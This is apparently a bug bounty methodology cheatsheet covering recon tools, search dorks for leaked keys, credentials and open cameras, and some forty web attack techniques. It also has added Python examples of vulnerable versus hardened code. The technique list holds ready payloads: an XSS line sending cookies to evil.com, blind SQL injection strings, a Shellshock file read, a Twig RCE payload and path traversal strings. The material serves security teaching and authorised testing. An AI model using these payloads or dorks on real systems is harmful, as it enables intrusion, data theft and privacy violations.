Bug Bounty Cheatsheet

noob to pro sheet

Uploaded by 724natividad

Recon workflow

Horizontal & vertical correlations


https://mxtoolbox.com/asn.aspx
https://viewdns.info/reversewhois
https://domaineye.com/
amass intel -org <company name here>
amass intel -asn <ASN Number Here>
amass intel -cidr <CIDR Range Here>
amass intel -whois -d <Domain Name Here>
amass enum -passive -d <Domain Name Here>
https://github.com/danielmiessler/SecLists
Subdomain bruteforcing - https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
https://github.com/internetwache/CT_subdomains
https://crt.sh/?q=%25.facebook.com
https://github.com/ghostlulzhacks/CertificateTransparencyLogs
gobuster dns -d starbucks.com -w subdomains.txt
https://github.com/infosec-au/altdns
A small list of these resources can be found below:
● VirusTotal
● Netcraft
● DNSdumpster
● ThreatCrowd
● Shodan
● Censys
● DNSDB
● Pastebin
knockpy.py <Domain Name Here>
https://github.com/blechschmidt/massdns

Finding AWS endpoints, AWS keys, URLs and upload fields in JavaScript


https://github.com/incogbyte/jsearch

Google dorks
site:<Third Party Vendor> <Company Name>
site:pastebin.com “Company Name”
site:*.atlassian.net “Company Name”
site:bitbucket.org “Company Name”
inurl:gitlab “Company Name”
https://pentest-tools.com/information-gathering/google-hacking#

Shodan dorks
net:<”CIDR,CIDR,CIDR”>
org:<”Organization Name”>
ssl:<”ORGANIZATION NAME”>

Censys - https://censys.io/ipv4

WAF detection - https://github.com/EnableSecurity/wafw00f
wafw00f <URL HERE>

WAF bypass - https://github.com/0xInfection/Awesome-WAF#known-bypasses

Subdomain takeover - https://github.com/haccer/subjack
https://github.com/EdOverflow/can-i-take-over-xyz

GitHub dorks - https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt

AWS S3
S3 bucket dorks - site:.s3.amazonaws.com "Starbucks"
https://github.com/ghostlulzhacks/s3brute
python amazon-s3-enum.py -w BucketNames.txt -d <Domain Here>

Google cloud storage


https://github.com/RhinoSecurityLabs/GCPBucketBrute
python3 gcpbucketbrute.py -k <Domain Here> -u

Digital ocean spaces


site:digitaloceanspaces.com <Domain Here>
https://github.com/appsecco/spaces-finder

Unauthenticated Elasticsearch DB
Shodan query: port:9200 elastic

Exposed Docker API
Shodan query: product:docker

Kubernetes API (unauthenticated REST API on port 10250)
Shodan query: product:"kubernetes"

Git dumper (.git) - https://github.com/internetwache/GitTools/tree/master/Dumper

Subversion (.svn) - https://github.com/anantshri/svn-extractor

CMS exploitation
WordPress - https://github.com/wpscanteam/wpscan
Joomla - https://github.com/rezasp/joomscan
Drupal - https://github.com/droope/droopescan
Adobe AEM - https://github.com/0ang3el/aem-hacker
Magento - https://github.com/steverobbins/magescan

URLSCAN
https://urlscan.io/
https://rapiddns.io
https://sitereview.bluecoat.com/#/

Security Tools
https://tools.tldr.run/
The Bug Hunter's Methodology v4.0 - Recon Edition (TBHMv4 notes, @jhaddix, #NahamCon2020)

S.No / Technique / Tools used or website used

1. Acquisitions: crunchbase
2. ASN enumeration: 1) ASN lookup 2) Metabigor 3) amass intel -asn <ASN number>
3. Reverse whois: 1) whoxy.com 2) Domlink
4. Ad/Analytics/technology identifying: builtwith.com
5. Google-FU: copyright text, terms of service text, privacy policy text
6. Shodan profiling: captures response data, cert data, stack data & more; use the Shodan membership API to fetch more info

Finding Subdomains

1. Linked & JS discovery (tool: Burp Suite Pro)
   With Burp Suite Pro:
   1) turn off passive scanning
   2) set forms to auto submit
   3) set scope, keywords
   4) browse main site
   5) spider all hosts
   6) target -> scope -> advanced scope control -> add host or IP range
   7) show only in-scope items
   8) select all hosts -> engagement tools -> analyze target -> save report as HTML file
   Other tools used: gospider & hakrawler

2. Subdomain & scraping
   Subdomain enumeration with Subdomainizer:
   1) find subdomains referenced in JS files
   2) find cloud services referenced in JS files
   3) use the Shannon entropy formula to find potentially sensitive items in JS files
   If you're just looking for subdomains, use subscraper.
   Infrastructure sources: Censys, Robtex, Wayback Machine, DNSdumpster, PTRarchive.com, Netcraft, DNSDB search, PassiveTotal etc.
   Search sources: Yahoo, Google, Baidu, Bing, Ask, Dogpile etc.
   Certificate sources: crt.sh, certspotter, certdb etc.
   Security sources: hackertarget, SecurityTrails, VirusTotal, F-Secure Riddler, ThreatCrowd, ThreatMiner etc.
   Scraping with Google:
     site:twitch.tv -www.twitch.tv
     site:twitch.tv -www.twitch.tv -watch.twitch.tv
     site:twitch.tv -www.twitch.tv -watch.twitch.tv -dev.twitch.tv
   Scraping with Amass: amass -d twitch.tv
   Scraping with Subfinder v2: subfinder -d hackerone.com -v
   Scraping with github-subdomains.py: python3 github-subdomains.py -t "githubpersonalaccounttoken" -d twitch.tv > twitch.tv
   Scraping with Shosubgo: go run main.go -d twitch.tv -s "githubtoken"
   Scraping with cloud ranges: technique to monitor AWS, GCP and Azure for SSL certificates

3. Subdomain bruteforcing (tool: massdns)
   Guessing for live subdomains with a large list of common subdomain names.
   Subdomain bruteforce with Amass:
     amass enum -brute -d twitch.tv -src
     amass enum -brute -d twitch.tv -rf resolvers.txt -w bruteforce.list
   Subdomain bruteforce with shuffleDNS:
     shuffledns -d hackerone.com -w words.txt -r resolvers-excellent.txt
   Subdomain bruting lists -> tomnomnom GitHub repo -> all.txt; Assetnote -> commonspeak2
   Alteration scanning: altdns (dev1.company.com, dev2.company.com, dev-1.company.com)

4. Port analysis & service analysis
   Port analysis - masscan: masscan -p1-65535 ip --max-rate 1800 -oG outputfile.txt
   Port analysis - dnmasscan: dnmasscan outputfile.txt dns.log -p80,443 -oG masscan.log
   Service scanning - brutespray, which takes the nmap -oG file format; scan the remote administration protocols for default passwords
   masscan -> nmap service scan -oG -> brutespray credential bruteforce

5. GitHub dorking (tool: github-search)
   GitHub dork collections -> jhaddix GitHub repo
   Full mode on GitHub and sensitive data exposure by @th3g3ntelman's video in Bugcrowd

6. Screenshotting: eyewitness, aquatone, httpscreenshot

7. Subdomain takeover: can-i-take-over-xyz GitHub repo
   Subdomain takeover tools used: SubOver & nuclei

8. Automation: tools & frameworks used - tomnomnom tools in GitHub repo
   Extending tools: interlace
   Recon frameworks:
   C-tier frameworks (found in GitHub repos):
     1) AdmiralGaust/bountyRecon
     2) offhoursscoding/recon
     3) Sambal0x/recon-tools
     4) JoshuaMart/Autorecon
     6) yourbuddy25/Hunter
     7) ultimate_recon.sh
     8) https://gist.github.com/dwisiswant05f647e3d406b5e984e6d69d3538968cd
   B-tier frameworks (found in GitHub repos):
     1) capt-meelo/LazyRecon
     2) phspade/Automated-Scanner
     3) shmilylty/OneForAll
     4) SolomonSklash/chomp-scan
     5) TypeError/domained
     6) Screetsec/Sudomy
     7) devanshbatham/Gorecon
     8) LordNeoStark/tugarecon
   A-tier frameworks (found in GitHub repos):
     1) Edu4rdSHL/findomain
     2) SilverPoision/Rock-ON
     3) epi052/recon-pipeline
   S-tier frameworks (found in GitHub repos):
     1) Intrigue.io
     2) AssetNote
     3) spiderfoot
     4) Project Discovery framework - use https://chaos.projectdiscovery.io/#/ to download the subdomain files of all public programs on HackerOne & Bugcrowd; watch for new domains
   Mindmaps: XMind - mind mapping software
Google Dork Technique

Popular Google dork operators (operator - details - example)

cache: - shows the cached version of any website. Example: cache: securitytrails.com
allintext: - searches for specific text contained on any web page. Example: allintext: hacking tools
allintitle: - exactly the same as allintext, but shows pages that contain titles with the given characters. Example: allintitle:"Security Companies"
allinurl: - fetches results whose URL contains all the specified characters. Example: allinurl client area
filetype: - searches for any kind of file extension; for example, to search for jpg files use: filetype: jpg
inurl: - exactly the same as allinurl, but only useful for one single keyword. Example: inurl: admin
intitle: - searches for keywords inside the title; for example, intitle:security tools will search for titles beginning with “security” but “tools” can be somewhere else in the page
inanchor: - useful when you need to search for an exact anchor text used on any links. Example: inanchor:"cyber security"
intext: - useful to locate pages that contain certain characters or strings inside their text. Example: intext:"safe internet"
link: - shows the list of web pages that have links to the specified URL. Example: link: microsoft.com
site: - shows the full list of all indexed URLs for the specified domain and subdomain. Example: site:securitytrails.com
* - wildcard used to search pages that contain “anything” before your word, e.g. how to * a website
| - logical operator, e.g. "security" "tips" will show all the sites which contain “security” or “tips,” or both words. Example: "security" "tips"
+ - used to concatenate words, useful to detect pages that use more than one specific key. Example: security + trails
- - minus operator, used to avoid results that contain certain words, e.g. security -trails will show pages that use “security” in their text, but not those that have the word “trails.” Example: security -trails

GitHub dorks (the third column of the same table)
filename:.npmrc _auth
filename:.dockercfg auth
extension:pem private
extension:ppk private
filename:id_rsa or filename:id_dsa
extension:sql mysql dump
extension:sql mysql dump password
filename:credentials aws_access_key_id
filename:.s3cfg
filename:wp-config.php
filename:.htpasswd
filename:.env DB_USERNAME NOT homestead
filename:.env MAIL_HOST=smtp.gmail.com
filename:.git-credentials

Example Google dorks
Log files - shows a lot of results that include username inside all *.log files: allintext:username filetype:log
Vulnerable web servers - detects vulnerable or hacked servers that allow appending “/proc/self/cwd/” directly to the URL of your website: inurl:/proc/self/cwd
Open FTP servers - explores public FTP servers, which can often reveal interesting things: intitle:"index of" inurl:ftp
ENV files - .env files are used by popular web development frameworks to declare general variables and configurations for local and online dev environments: site:xyz.com/.env
SSH private keys - SSH private keys are used to decrypt information exchanged in the SSH protocol: intitle:index.of id_rsa -id_rsa.pub
PuTTY logs - a simple dork to fetch SSH usernames from PuTTY logs: filetype:log username putty
Email lists - fetches Excel files which may contain a lot of email addresses: filetype:xls inurl:"email.xls"; filtered to .edu domain names only, one popular university turned up around 1800 emails from students and teachers: site:.edu filetype:xls inurl:"email.xls"
Live cameras - fetches live camera web pages that are not restricted by IP. IP-based cameras: inurl:top.htm inurl:currenttime; WebcamXP-based transmissions: intitle:"webcamXP 5"; general live cameras: inurl:"lvappl.htm"
MP3, movie and PDF files - if you're one of those classic individuals who still download legal music, this dork finds mp3 files: intitle: index of mp3; the same applies to legal free media files or PDF documents: intitle: index of pdf intext: .mp4
Weather - fetches Weather Wing device transmissions; if you're involved in meteorology or merely curious, check this out: intitle:"Weather Wing WS-2"
S.No / Vulnerability name / Approach / Tool used

1. Privilege escalation (tool: Burp Suite)
   Horizontal (admin-admin & user-to-user) / vertical privilege escalation (user-admin)

2. Privacy settings bugs (tool: Burp Suite)

3. Session bugs (tool: Burp Suite)
   Check whether session tokens/access tokens:
   - expire on logout
   - expire on password reset/change
   - expire on user removal
   - expire on changing roles
   - insufficient session fixation - cookie editor extension used

4. Insecure CORS misconfiguration (tool: Corsy / Burp Suite)
   curl command to detect: curl http://site.com -H "Origin: http://evil.com" -I
   if the response carries access-control-allow-origin: * - not exploitable
   origins to try: evil.com, site.evil.com, null
   if any such site discloses usernames & passwords, try a CORS exploit
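Added example, not from the cheatsheet: an exact-match CORS allowlist beside the reflect-anything and prefix-match policies that make row 4 exploitable, plus a classifier that applies the row's rule (a wildcard is not exploitable for credentialed reads; a reflected attacker origin plus credentials is). All origins and host names are constructed for the demo.

```python
# Added example (not from the cheatsheet). Constructed origins throughout.

ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def cors_reflect_any(origin):
    """Vulnerable: echoes whatever Origin the client sent and allows credentials."""
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}

def cors_prefix_match(origin):
    """Vulnerable: a 'starts with our origin' check lets app.example.com.evil.com through."""
    if origin is not None and origin.startswith("https://app.example.com"):
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}

def cors_allowlist(origin):
    """Hardened: exact match against a fixed set; anything else gets no CORS headers."""
    if origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}  # stop caches serving one origin's answer to another
    return {}

def classify(probe_origin, headers):
    """Verdict for one probe Origin, following the row's rule of thumb."""
    h = {k.lower(): v for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        return "wildcard-not-exploitable"  # browsers refuse '*' together with credentials
    if acao == probe_origin:
        return "probe-allowed-with-credentials" if creds else "probe-allowed-no-credentials"
    return "fixed-origin"

# The row's three probes (evil.com, site.evil.com, null) plus one aimed at prefix checks.
PROBES = ["https://evil.com", "https://site.evil.com", "null",
          "https://app.example.com.evil.com"]

def audit(policy):
    """Run every probe against a policy and return the verdict per probe."""
    return {o: classify(o, policy(o)) for o in PROBES}

def findings(policy):
    """Probes an attacker could use for credentialed cross-origin reads."""
    return sorted(o for o, v in audit(policy).items()
                  if v == "probe-allowed-with-credentials")
```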
5. CSRF (tool: jsfiddle.net / Burp Suite)
   Intercept the victim request, generate a CSRF PoC and send it to the server as the attacker
   - CSRF can be GET or POST based
   - try in all state-changing requests
   use: jsfiddle.net online tool
   check whether it validates origin/referer; if not, CSRF is possible
   check whether it is cookie-based authentication
   if anti-CSRF tokens are there:
   1) remove anti-CSRF tokens & parameter
   2) pass blank parameter
   3) add a token of similar length
   4) add another user's valid anti-CSRF token
   5) random token of long length (aaaaaaaaa)
   if content-type verification:
   1) if no anti-CSRF tokens are there
   2) try content-type=text/plain
   Flash CSRF: check if there is any crossdomain policy; use the swf json tool

6. XSS (tool: xss validator / Burp Suite)
   1) input value (try a payload like '"batman()<>) reflected without XSS protection
   2) xss validator - Intruder
   3) host header injection through XSS
      add referer: batman
      host header: bing.com">script>alert(document.domain)</script><"
   4) URL redirection through XSS
      document.location.href="http://evil.com"
   5) phishing through XSS - iframe injection
      <iframe src="http://evil.com" height="100" width="100"></iframe>
   6) cookie stealing through XSS
      document.location.href="http://evil.com/p/?page="+document.cookie
   7) file upload through XSS
      upload a picture file, intercept it, change picturename.jpg to an XSS payload using an Intruder attack
   8) remote file inclusion (RFI) through XSS
      php?=http://brutelogic.com.br/poc.svg - XSS payload
   9) convert self XSS to reflected
      copy the response into a file.html -> it will work
   10) XSS through URI parameters
      site.com/about/xss"><script>
7. Host header injection (tool: Burp Suite)
   1) URL redirection through host header (check URLs returning 2xx, 3xx)
      real host to bing.com
      X-Forwarded-Host: realweb.com
      X-Forwarded-Host: bing.com
   2) web cache poisoning through HHI
      injection will be reflected in any buttons of the page
   3) host header attack on password reset page
   4) XSS through HHI
8. URL redirection or open redirect (tool: Burp Suite)
   1) common parameter list: dest, redirect, uri, path, continue, url, window, to, out, view, dir, show, navigation, open, u, file, val, validate, domain, callback, return, page, feed, host, port, next, data, reference, site, html
   2) site.com/bing.com, site.com//bing.com, site.com/payloads

9. Parameter tampering (tool: Burp Suite)
   ecommerce websites

10. HTML injection (tool: Burp Suite)
   1) GET or POST method
   2) input value reflecting back
   3) <h1>adam</h1>
   4) URL redirection via HTML injection

11. File inclusion (tool: LFISuite from GitHub)
   1) LFI & RFI
   2) LFI: any.com/index.php?reference=login.php
   3) RFI: any.com/?share=http://evil.com/
   common parameters to look on: file, document, folder, root, path, pg, style, pdf, template, php_path, doc, dest, redirect, uri, path, continue, url, window, next, data, reference, site, html, val, validate, domain, callback, return, page, feed, port, host, to, out, view, dir, show, navigation, open
   4) LFI - /var/www/html/ & /etc/passwd
      ../../etc/passwd

12. Missing SPF, DMARC records
   detecting - mxtoolbox.com, anonymousmail.me, https://emkei.cz/
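Added example, not from the cheatsheet: an offline checker for what the lookup tools above report for row 12, evaluating a domain's SPF record (missing, `+all`, `?all`, `~all`, `-all`) and its DMARC policy (`p=` tag) into a single spoofing-exposure verdict. The TXT records fed in are constructed; in practice they come from the apex and `_dmarc.<domain>` TXT lookups.

```python
# Added example (not from the cheatsheet). Records below are constructed.

def evaluate_spf(txt_records):
    """Verdict on the apex TXT set: missing, multiple, pass-all, neutral-all,
    softfail, hardfail or no-all."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if not spf:
        return "missing"
    if len(spf) > 1:
        return "multiple"            # RFC 7208: more than one SPF record is a permerror
    terms = spf[0].split()
    last = terms[-1].lower() if len(terms) > 1 else ""
    if last in ("all", "+all"):
        return "pass-all"            # anyone may send as this domain
    if last == "?all":
        return "neutral-all"
    if last == "~all":
        return "softfail"
    if last == "-all":
        return "hardfail"
    return "no-all"                  # e.g. only a redirect= modifier, or no mechanisms

def evaluate_dmarc(txt_records):
    """Policy from the _dmarc TXT set: none, quarantine, reject, missing or invalid."""
    rec = [r for r in txt_records if r.lower().startswith("v=dmarc1")]
    if not rec:
        return "missing"
    tags = {}
    for kv in rec[0].split(";"):
        if "=" in kv:
            k, v = kv.split("=", 1)
            tags[k.strip().lower()] = v.strip().lower()
    if "p" in tags:
        return tags["p"]
    # RFC 7489 6.6.3: a record without p= but with rua= is treated as p=none
    return "none" if "rua" in tags else "invalid"

def spoofing_exposure(apex_txt, dmarc_txt):
    """Combine both verdicts into the exposure a defender cares about."""
    spf, dmarc = evaluate_spf(apex_txt), evaluate_dmarc(dmarc_txt)
    weak_spf = spf in ("missing", "multiple", "pass-all", "neutral-all", "no-all")
    weak_dmarc = dmarc in ("missing", "invalid", "none")
    if weak_spf or weak_dmarc:
        level = "high"               # mail claiming this domain is not rejected anywhere
    elif dmarc == "reject" and spf == "hardfail":
        level = "low"
    else:
        level = "medium"             # softfail / quarantine: depends on receiver behaviour
    return {"spf": spf, "dmarc": dmarc, "exposure": level}

# Constructed record sets, not real domains' data.
WEAK = (["v=spf1 include:_spf.example.net +all", "google-site-verification=abc"],
        ["v=DMARC1; p=none; rua=mailto:dmarc@example.com"])
STRONG = (["v=spf1 ip4:192.0.2.0/24 -all"],
          ["v=DMARC1; p=reject; rua=mailto:dmarc@example.com"])
```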
13. SSRF (tool: Burp Collaborator / https://www.expressvpn.com/what-is-my-ip)
   1) making a request from the vulnerable application to a target website
   2) common parameters to look on: dest, redirect, uri, path, continue, url, window, next, data, reference, site, html, val, validate, domain, callback, return, page, view, dir, show, file, document, folder, root, path, pg, style, pdf, template, php_path, doc, feed, host, port, to, out, navigation, open, result
   3) detection using https://www.expressvpn.com/what-is-my-ip; Burp Collaborator is also used
   4) any.com/index/php?uri=http://external.com
   exploitation of SSRF (read file from server, scan the internal network, SSRF with RFI):
   5) read file from server - file:///identf - Intruder on the identifier - use LFI payloads
   6) scan the internal network - http://localhost:1 (changing the port number to top common ports like 21, 22 etc)
   7) SSRF with RFI - executing code from the external domain (use hackoff.html with an XSS script)

14. Critical file found & source code disclosure (tool: Burp Suite)
   1) using the payloads from https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content
   2) use dirsearch

15. Subdomain takeover (tool: github.com/nahamsec/HostileSubBruteforcer)
   1) if the website is no longer used by the target but still points at a service provider
   signing up on service providers like GitHub, Heroku, Shopify, Zendesk, AWS, Tumblr etc to take over domains

16. Command injection (tool: github.com/commixproject/commix.git)
   1) taking input as a command, reflecting the output of that command
   2) common parameters to look on: daemon, host, upload, dir, execute, download, log, ip, cli, cmd, filename
   3) how to find cmdi: using a delimiter list (like ;^&, &&, |, ||, %0D, %0A, \n, <)
   4) how to find - find an input field interacting with the OS shell
   5) try with delimiter & shell commands
   6) ;dir, ;/etc/passwd
   7) intercept - use cluster bomb - first parameter for the delimiter & 2nd for command payloads

17. File upload vulnerability (tool: github.com/almandin/fuxploider)
   1) simple file upload - shell.php - full control of server - run shell commands
   2) github.com/fuzzdb-projects/fuzzdb/tree/master/attack/file-upload/malicious-images
   3) pixel flood attack
   4) content type verification
   5) extension verification

18. XXE injection (tool: pingb.in / Burp Suite)
   1) input field - use XXE payloads in Intruder to detect
   2) check whether the website accepts a content-type=text/xml header -> 200 OK
   3) use the online tool pingb.in - check for an external ping
   4) for blind XXE - use python -m SimpleHTTPServer 80
   5) SYSTEM "file:///etc/passwd" for local file read
   6) SYSTEM "http://systemip/readinganyfile" - blind XXE
   7) php:// to get RCE
   8) use gopher or other URI handlers to exploit XXE
   common places to find XXE:
   1) XML file upload (eg: config files)
   2) XML input fields
   3) XML-based APIs
   4) XML-based files (RSS, SVG)

19. Account lockout (tool: Burp Suite)
   1) prevents bruteforce attacks
   2) intercept the login page with user credentials in Burp
   3) send the request to Sequencer
   4) or send to Intruder - make 1000 requests
   5) do credential stuffing
   6) the account needs to lock out for 30 minutes to 24 hours

20. Blind XSS (tool: Burp Suite / xsshunter.com)
   1) type of stored XSS - attacker input saved on the server - saved in the database
   2) it won't be reflected
   3) look for blind XSS in pages like (contact us, log viewers, feedback page, chat app, ticket generation app, any app using moderation or updates, saving forms)
   4) online tool used - xsshunter.com
   5) copy the payload & paste it in the input field
   6) reflection will be found on xsshunter.com
   7) multiple blind XSS using Intruder

21. Buffer overflow - web (tool: Burp Suite)
   1) intercept the login page - pass a long string of passwords or any quantity of input; the page will load slowly
   - types of overflows - buffer, stack, heap, integer, format string
   2) DoS using buffer overflow - application DoS attack

22. CMS vulnerability hunting (tools: wpscan, cmsmap, cmsscan, joomscan, drupwn, vbulletin scanner, mage scanner, owaspVBScan)
   1) WordPress, Joomla, Drupal, vBulletin, Magento
   2) find a vulnerable component in the CMS
   3) search for an exploit in Google

23. IDOR (tool: Burp Suite)
   scenario 1:
   1) mostly found on user settings or profile management
   2) two accounts required
   3) intercept the request - change the email id of the attacker
   4) logout
   5) try login with the victim account - it won't work
   scenario 2 - user moderation:
   1) find the user id
   2) replace the victim id with the attacker id
   3) do the functionality

24. Long password DoS attack (tool: Burp Suite)
   1) password - hashing - process - resource consumption by CPU
   2) same as buffer overflow - but trying only in the password field which doesn't have a password length limit
   3) try to sign up an account
   4) give details, intercept the request
   5) give a password longer than the length - forward the request
   6) application DoS
25. No rate limiting vulnerability - logical flow (tool: Burp Suite)
   1) capture the forgot password page or even any request into Burp Suite
   2) send to Intruder
   3) make 1000 requests
   4) it will affect both user & server

26. Password reset poisoning (tool: Burp Suite)
   1) forgot password page -> intercept in Burp Suite
   2) host header attack
   3) the victim will receive an email from the evil website mentioned in the host header
27. Broken access control (missing function level access control, IDOR, privilege escalation, authorization bypass, business logic flaws, forceful browsing, parameter manipulation, path traversal, local file include)
   Common parameters: id, user, account, number, order, no, doc, key, email, group, profile, edit, numeric values
   Functions to look on: change email, change password, upgrade/downgrade user role, create/remove/update/delete context-specific app data, shipping, invoices and document viewing
   Burp extensions used: authmatrix, authz, autorize & autorepeater

   IDOR
   Browsing with account 1: https://acme.com/changepw/id?=1234
   You can create a 2nd account and you get assigned https://acme.com/changepw/id?=5678
   If you completely log out, log into account #1 and issue the request with the uid from account #2, you may be able to change that account's password. Having to find users' GUIDs lowers the priority a bit, but look for other endpoints that might allow you to search for a user's GUID.
   Hash-based IDOR: the user id is sometimes hashed or base64-encoded

   Local file inclusion, path traversal
   GET /view?pg=termsandservices
   GET /view?pg=../../../../../etc/passwd%00

   Missing function level access control
   forceful browsing:
   GET /admin/viewTransactions
   GET /ADMIN/viewTransactions
   static files:
   GET /patientIMAGES/3216647.jpg
   GET /patientDocuments/21714.pdf
   direct function calling:
   POST /admin/viewTransactions.ashx?admin=true&from=08032017&to=08032018

   Parameter manipulation & logic bugs
   giving a negative price
   logic flow - ecommerce: skipping steps in workflows (add item -> checkout -> enter shipping info -> payment)
28. Account takeover via forgot password page (tool: Burp Suite)
   1) intercept the forgot password page
   2) add X-Forwarded-Host: bing.com
   3) forward the request
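Added example, not from the cheatsheet, covering rows 7, 26 and 28: a password-reset mailer that builds the link from the request's `Host` / `X-Forwarded-Host` beside the hardened version that validates `Host` against an allowlist and builds the link only from a configured canonical origin. Host names, the token and the helper names are constructed for the demo.

```python
# Added example (not from the cheatsheet). Constructed hosts and token.
from urllib.parse import urlsplit

CANONICAL_ORIGIN = "https://accounts.example.com"
ALLOWED_HOSTS = {"accounts.example.com", "www.example.com"}

def _header(headers, name):
    """Case-insensitive header lookup; None if absent."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None

def reset_link_weak(headers, token):
    """Vulnerable: trusts X-Forwarded-Host (then Host) for the link the victim receives,
    so the header added in step 2 decides where the reset token is sent."""
    host = _header(headers, "X-Forwarded-Host") or _header(headers, "Host")
    return f"https://{host}/reset?token={token}"

def reset_link_hardened(headers, token):
    """Hardened: Host must be one we actually serve, X-Forwarded-Host is never read,
    and the link comes from configuration rather than from the request."""
    host = (_header(headers, "Host") or "").split(":", 1)[0].lower()
    if host not in ALLOWED_HOSTS:
        # Worth logging: a Host we do not serve is exactly the probe the rows describe.
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"{CANONICAL_ORIGIN}/reset?token={token}"

def link_host(url):
    """Host name the victim's mail client would be sent to."""
    return urlsplit(url).hostname

# Constructed request, as sent in step 2 of the row above.
POISONED = {"Host": "accounts.example.com", "X-Forwarded-Host": "bing.com"}
```

The `split(":")` handles `host:port` only; IPv6 literals in `Host` would need bracket-aware parsing.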
29. Broken access control (tool: Burp Suite)
   1) create an account
   2) change the email id from A to B
   3) now generate forgot password for email A
   4) also try the same concept on the password

30. Rate limiting bypass (tool: Burp Suite)
   1) intercept the forgot password page
   2) send to Intruder
   3) add X-Forwarded-Host: bing.com
   4) target the email
   5) forward the request

31. Lack of password confirmation (tool: Burp Suite)
   required to delete account, change email id

32. 2FA or OTP bypass (tool: Burp Suite)
   1) go to the registration section and fulfill all the requirements
   2) click to get the code and intercept the request through the Burp proxy
   3) right click the request and send to Intruder
   4) bruteforce the 6 digits through Burp Intruder, because there is no rate limit and no captcha verification implemented in the get-SMS option
   5) analyze the content length in Burp Intruder
   6) after 1000 or more tries the attacker is able to bypass OTP verification or register any mobile number without OTP verification

33. Blind SQL injection (tool: Burp Suite or cookie manager)
   1) check an input field and insert a payload like id=1
   2) insert in user-agent
   3) confirm the change in the time interval
   Note payloads:
   id=5+and+1=2
   ',0)waitfor delay'0:0:05'--
   1) if(now()=sysdate(),sleep(5),0)) --
   2) (select(0)from(select(sleep(3)))v)/*'+(select(3)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
   3) 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
   4) ' and extractvalue(1,concat(0x0a,@@version)) or'

34. Remote code execution vulnerability (tool: Burp Suite or manually)
   scenario 1:
   1) go to target website xyz.com
   2) create an account and verify the email address
   3) go to xyz.com/setting/profile
   4) in company logo upload a malicious file/image e.g. RCE.php%00.gif and click on save
   5) now left click on the logo and view the image
   6) a new URL will open; at the end of the URL add ?cmd=id and you can see the id command execute successfully
   scenario 2:
   1) crawl your target using Burp Suite, check for /cgi-bin/status
   2) send to Repeater
   3) replace user-agent: {:;};echo $(</etc/passwd)
   4) click on send and in the response you will see the root user info of the web server

35. Stealing OAuth token (tool: Burp Suite)
   1) login using a 3rd party app like Facebook, Gmail...
   2) intercept the request using Burp Suite
   3) change redirect_url=bugbountypoc.com
   4) in case of failure change the referer header parameter to bugbountypoc.com

36. External service interaction (tool: Burp Suite)
   1) capture the request using Burp Suite
   2) send to Repeater
   3) in the host header replace realweb with the Burp Collaborator payload, or add a new header x-forwarded-for: Burp Collaborator payload
   4) forward the request
   5) check whether the Burp Collaborator responses show it was able to perform a DNS lookup

37. Server side include injection (tool: Burp Suite)
   1) intercept the request using Burp Suite
   2) spider the target host
   3) search for .shtml extension pages
   4) after finding these pages, in an input field add the payload <!--#echo var="DATE_LOCAL" -->
   5) forward the request and check the response

38. Client and server side template injection (automation tool for SSTI exploitation: https://github.com/epinna/tplmap)
   Manual checking:
   1) used to display dynamic content on a web page
      curl -g 'http://www.target.com/page?name=John'
      Hint: if the input reflects back, then try to insert the payload
      curl -g 'http://www.target.com/page?name={{7*7}}'
   2) web template engines which use this:
      FreeMarker - Java-based template engine
      Velocity - Java-based template engine
      Smarty - PHP template engine
      Twig - PHP template engine
      Jade - Node.js template engine
      Jinja2 - Python/Flask template engine
   Basic payloads:
      {{7*7}}
      {{7*'7'}}
      {% extends "/etc/passwd" %}
   RCE payload - Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

39. Exif geolocation data not stripped (tool: exif.regex.info/exif.cgi)
   1) download an image from https://github.com/ianare/exif-samples
   2) go to jpg > go to GPS > download picture > save to PC
   3) upload the image on the target website
   4) copy the image URL and paste it into the tool (http://metapicz.com/)
40. CRLF injection (tool: Burp Suite)
   0) capture the request using Burp Suite
   1) insert arbitrary data in an input field like =aaaaaaaaaaaaa
   2) if the input reflects in a response header it means that it is vulnerable
      Carriage return: %0D
      Line feed: %0A
   3) add a payload like %0a%0dxxxxxxxxxxxxx
   4) after inserting this payload, if it reflects in the response header with a new line then add a new cookie header
   5) return_url=aaaa%0a%0dset-cookie:mycookie
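Added example, not from the cheatsheet: a redirect handler that copies `return_url` into the `Location` header beside one that rejects any decoded CR or LF, with a small header parser that shows the extra `set-cookie` line from step 5 only appearing in the weak variant. The endpoint and function names are constructed.

```python
# Added example (not from the cheatsheet).
import re
from urllib.parse import unquote

def build_redirect_weak(return_url):
    """Vulnerable: the decoded parameter is pasted straight into a header line,
    so %0a/%0d inside it terminate the line and start a new header."""
    value = unquote(return_url)
    return "HTTP/1.1 302 Found\r\nLocation: " + value + "\r\n\r\n"

def header_value_or_reject(value):
    """Decode once, then refuse any value that would break out of its header line."""
    decoded = unquote(value)
    if "\r" in decoded or "\n" in decoded:
        raise ValueError("CR/LF in header value")
    return decoded

def build_redirect_hardened(return_url):
    """Hardened: same response, but the value is validated before it reaches a header."""
    value = header_value_or_reject(return_url)
    return "HTTP/1.1 302 Found\r\nLocation: " + value + "\r\n\r\n"

def header_names(raw_response):
    """Header names a lenient client would see; splits on CRLF, bare LF and bare CR
    because real clients accept all three as line ends."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    lines = re.split(r"\r\n|\n|\r", head)[1:]   # drop the status line
    return [line.split(":", 1)[0].strip().lower() for line in lines if ":" in line]

# Payload from step 5 of the row above.
PAYLOAD = "aaaa%0a%0dset-cookie:mycookie"
```

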